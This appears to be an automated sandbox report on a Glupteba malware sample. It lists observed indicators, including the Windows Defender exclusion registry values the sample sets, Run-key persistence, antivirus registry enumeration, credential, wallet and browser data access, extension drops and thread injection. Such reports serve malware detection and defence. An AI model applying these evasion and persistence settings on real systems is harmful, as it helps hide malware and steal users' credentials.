glupteba | 344d7b46385722db4733eee860283c00327c85f28dd76acc996be63f4c4c956e

System Information Discovery

Processes:

setup.exesetup.exesetup.exerundll32.exesetup.exesetup.exeppBOOOa.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ppBOOOa.exe

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

setups.tmpsetups.tmpsetups.tmpsetups.tmpcmd.execmd.exesetups.tmp

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	setups.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	setups.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	setups.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	setups.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	setups.tmp

Loads dropped DLL 64 IoCs

Processes:

Setup3310.tmpSetup.tmpDelta.tmpPictureLAb.tmpSetup.tmpSetup.exemain.exeprivacytools5.exesetups.tmpsetup.exeSetup3310.tmpvict.tmpIBInstaller_97039.tmpvpn.tmpSetup.tmpapp.exeDelta.tmpPictureLAb.tmpSetup.tmpSetup.exemask_svc.exepatch.exemain.exeprivacytools5.exesetups.tmp33E8.tmp.exesetup.exeSetup3310.tmp

pid	process
3664	Setup3310.tmp
3664	Setup3310.tmp
644	Setup.tmp
644	Setup.tmp
208	Delta.tmp
208	Delta.tmp
1576	PictureLAb.tmp
1576	PictureLAb.tmp
1856	Setup.tmp
1364	Setup.exe
1364	Setup.exe
14492	main.exe
15656	privacytools5.exe
16500	setups.tmp
16500	setups.tmp
16500	setups.tmp
16500	setups.tmp
16500	setups.tmp
15944	setup.exe
5184	Setup3310.tmp
5184	Setup3310.tmp
5316	vict.tmp
5368	IBInstaller_97039.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
5328	vpn.tmp
6720	Setup.tmp
6720	Setup.tmp
5300	app.exe
8460	Delta.tmp
8460	Delta.tmp
8872	PictureLAb.tmp
8872	PictureLAb.tmp
7420	Setup.tmp
8816	Setup.exe
8816	Setup.exe
11984	mask_svc.exe
11984	mask_svc.exe
11984	mask_svc.exe
11984	mask_svc.exe
11984	mask_svc.exe
11984	mask_svc.exe
13460	patch.exe
13460	patch.exe
13460	patch.exe
5328	vpn.tmp
5328	vpn.tmp
13460	patch.exe
14024	main.exe
5364	privacytools5.exe
5932	setups.tmp
5932	setups.tmp
5932	setups.tmp
5932	setups.tmp
5932	setups.tmp
16624	33E8.tmp.exe
2628	setup.exe
10504	Setup3310.tmp
10504	Setup3310.tmp

Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Windows security modification 2 TTPs 10 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

Processes:

app.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\WinterMountain = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\app.exe = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	app.exe

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 10 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

Processes:

multitimer.exemultitimer.exemultitimer.exegaooo.exehjjgaa.exe4620154.50multitimer.exeHGT.exeapp.exemultitimer.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\2gg5ki2z4kt = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\4L5HLNWXAD\\multitimer.exe\" 1 3.1616085481.605381e99dd96"	multitimer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ttvchbfpspz = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\ZN78VHHWTU\\multitimer.exe\" 1 3.1616085598.6053825e29300"	multitimer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\3nyt1te2ijq = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\YYL09XWJKS\\multitimer.exe\" 1 3.1616085924.605383a473ca8"	multitimer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	gaooo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	hjjgaa.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host = "C:\\ProgramData\\Windows Host\\Windows Host.exe"	4620154.50
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\cugdqneu5wr = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\TL86OE6QBX\\multitimer.exe\" 1 3.1616085799.60538327b0368"	multitimer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Google\\Daecycyfaewy.exe\""	HGT.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinterMountain = "\"C:\\Windows\\rss\\csrss.exe\""	app.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\haylvbn4q21 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\S8C672O6LF\\multitimer.exe\" 1 3.1616085669.605382a51bc0b"	multitimer.exe

Checks for any installed AV software in registry 1 TTPs 64 IoCs

Security Software Discovery

T1063

Processes:

multitimer.exemultitimer.exemultitimer.exemultitimer.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Fortinet\FortiClient\installed	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Jiangmin\ComputerID	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\MACHINE\Software\Avira\Antivirus	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\FRISK Software\F-PROT Antivirus for Windows	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Fortinet\FortiClient\installed	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\KasperskyLab	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\K7 Computing\K7TotalSecurity	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\G Data\AntiVirenKit	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Bitdefender\QuickScan	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\BullGuard Ltd.\BullGuard\Main	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Bitdefender\QuickScan	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\McAfee\DesktopProtection	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\K7 Computing\K7TotalSecurity	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\IKARUS\anti.virus	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\IKARUS\anti.virus	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\IKARUS\anti.virus	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Sophos	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\KasperskyLab	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80	multitimer.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 5 IoCs

evasion trojan

System Information Discovery

Processes:

md7_7dfj.exemd7_7dfj.exemd7_7dfj.exemd7_7dfj.exemd7_7dfj.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md7_7dfj.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md7_7dfj.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md7_7dfj.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md7_7dfj.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md7_7dfj.exe

Drops Chrome extension 4 IoCs

Processes:

QDsgliQ.exeaskinstall24.exeDNnZcAy.exeaskinstall29.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ffbilhfoibpnndjdfmbfanapdpmebbnl\1.0_0\manifest.json	QDsgliQ.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\colgdlijdieibnaccfdcdbpdffofkfeb\6.37.18_0\manifest.json	askinstall24.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ffbilhfoibpnndjdfmbfanapdpmebbnl\1.0_0\manifest.json	DNnZcAy.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\fiogdnnnljjlfjgkifccooilblmjflkm\5.18.6_0\manifest.json	askinstall29.exe

Drops desktop.ini file(s) 1 IoCs

Processes:

SxjcCox.exe

description ioc process

File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini SxjcCox.exe
Installs/modifies Browser Helper Object 2 TTPs
BHOs are DLL modules which act as plugins for Internet Explorer.
stealer adware

Modify Registry
T1112

Browser Extensions
T1176
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

description	ioc	process
File opened for modification	C:\$RECYCLE.BIN\S-1-5-18\desktop.ini	SxjcCox.exe

Looks up external IP address via web service 29 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
546	ipinfo.io
551	ipinfo.io
55	ipinfo.io
220	ipinfo.io
18327	ipinfo.io
19799	ip-api.com
214	ipinfo.io
1229	ipinfo.io
6	ipinfo.io
62	ipinfo.io
604	ipinfo.io
17917	ipinfo.io
254	checkip.amazonaws.com
532	checkip.amazonaws.com
262	api.ipify.org
5537	ip-api.com
14825	ipinfo.io
4	ipinfo.io
94	ip-api.com
690	ip-api.com
1488	ipinfo.io
281	ipinfo.io
288	ipinfo.io
4005	ipinfo.io
341	ip-api.com
3727	ipinfo.io
14833	ipinfo.io
182	checkip.amazonaws.com
612	ipinfo.io

Maps connected drives based on registry 3 TTPs 10 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

multitimer.exemultitimer.exemultitimer.exemultitimer.exemultitimer.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe

Drops file in System32 directory 46 IoCs

Processes:

DrvInst.exeDNnZcAy.exeQDsgliQ.exesetup.exesetup.exesetup.exerundll32.exepowershell.exermwnDPC.exepowershell.exetapinstall.exeDrvInst.exesetup.exepowershell.exepowershell.exeppBOOOa.exesetup.exe

description	ioc	process
File created	C:\Windows\System32\DriverStore\Temp\{5dcc0f68-1e3b-5d40-b5cd-0b34be9b411a}\SET8386.tmp	DrvInst.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	DNnZcAy.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CC197601BE0898B7B0FCC91FA15D8A69_63B828E1707C37CA3C35011677B59CC6	QDsgliQ.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	setup.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{5dcc0f68-1e3b-5d40-b5cd-0b34be9b411a}\SET8374.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf	DrvInst.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	setup.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CC197601BE0898B7B0FCC91FA15D8A69_63B828E1707C37CA3C35011677B59CC6	QDsgliQ.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	setup.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	rundll32.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	QDsgliQ.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	rmwnDPC.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	rundll32.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{5dcc0f68-1e3b-5d40-b5cd-0b34be9b411a}	DrvInst.exe
File created	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF	tapinstall.exe
File created	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF	DrvInst.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	rundll32.exe
File created	C:\Windows\System32\DriverStore\Temp\{5dcc0f68-1e3b-5d40-b5cd-0b34be9b411a}\SET8374.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{5dcc0f68-1e3b-5d40-b5cd-0b34be9b411a}\SET8385.tmp	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{5dcc0f68-1e3b-5d40-b5cd-0b34be9b411a}\SET8385.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{5dcc0f68-1e3b-5d40-b5cd-0b34be9b411a}\SET8386.tmp	DrvInst.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	setup.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	rmwnDPC.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B	QDsgliQ.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	QDsgliQ.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B	QDsgliQ.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	QDsgliQ.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{5dcc0f68-1e3b-5d40-b5cd-0b34be9b411a}\oemvista.inf	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys	DrvInst.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	DrvInst.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	rundll32.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	rundll32.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	QDsgliQ.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	QDsgliQ.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{5dcc0f68-1e3b-5d40-b5cd-0b34be9b411a}\tap0901.cat	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{5dcc0f68-1e3b-5d40-b5cd-0b34be9b411a}\tap0901.sys	DrvInst.exe
File created	C:\Windows\System32\DriverStore\drvstore.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat	DrvInst.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	QDsgliQ.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	ppBOOOa.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	setup.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs

Processes:

parse.exeparse.exeparse.exemask_svc.exemask_svc.exemask_svc.exe

pid	process
5024	parse.exe
5000	parse.exe
5052	parse.exe
5024	parse.exe
5000	parse.exe
5052	parse.exe
5024	parse.exe
9344	mask_svc.exe
10744	mask_svc.exe
11984	mask_svc.exe

Suspicious use of SetThreadContext 6 IoCs

Processes:

privacytools5.exejjSCW2eoA.exeprivacytools5.exeprivacytools5.exeprivacytools5.exeprivacytools5.exe

description	pid	process	target process
PID 15252 set thread context of 15656	15252	privacytools5.exe	privacytools5.exe
PID 7268 set thread context of 7820	7268	jjSCW2eoA.exe	jjSCW2eoA.exe
PID 15748 set thread context of 5364	15748	privacytools5.exe	privacytools5.exe
PID 6988 set thread context of 8660	6988	privacytools5.exe	privacytools5.exe
PID 13728 set thread context of 4704	13728	privacytools5.exe	privacytools5.exe
PID 18044 set thread context of 17916	18044	privacytools5.exe	privacytools5.exe

Drops file in Program Files directory 64 IoCs

Processes:

app.exeQDsgliQ.exeDNnZcAy.exeIBInstaller_97039.tmpvpn.tmpSxjcCox.exeMaskVPNUpdate.exe7za.exesetup.exesetup.exeprolab.tmp

description	ioc	process
File created	C:\Program Files (x86)\Black-Haze\help.txt	app.exe
File created	C:\Program Files (x86)\Black-Haze\winamp-plugins.7z	app.exe
File created	C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\bg\messages.json	QDsgliQ.exe
File created	C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\zh_CN\messages.json	DNnZcAy.exe
File opened for modification	C:\Program Files (x86)\yjiDqdgnMIE\files\Kernel.js	DNnZcAy.exe
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\ServiceModelInstallRC.dll	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Refactoring.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\is-MNL7N.tmp	vpn.tmp
File created	C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\zh_TW\messages.json	QDsgliQ.exe
File created	C:\Program Files (x86)\yjiDqdgnMIE\eIqwpVq.exe	QDsgliQ.exe
File created	C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\sl\messages.json	DNnZcAy.exe
File created	C:\Program Files (x86)\MaskVPN\is-4AB21.tmp	vpn.tmp
File created	C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\pl\messages.json	SxjcCox.exe
File created	C:\Program Files (x86)\yjiDqdgnMIE\kVLys0L.dll	SxjcCox.exe
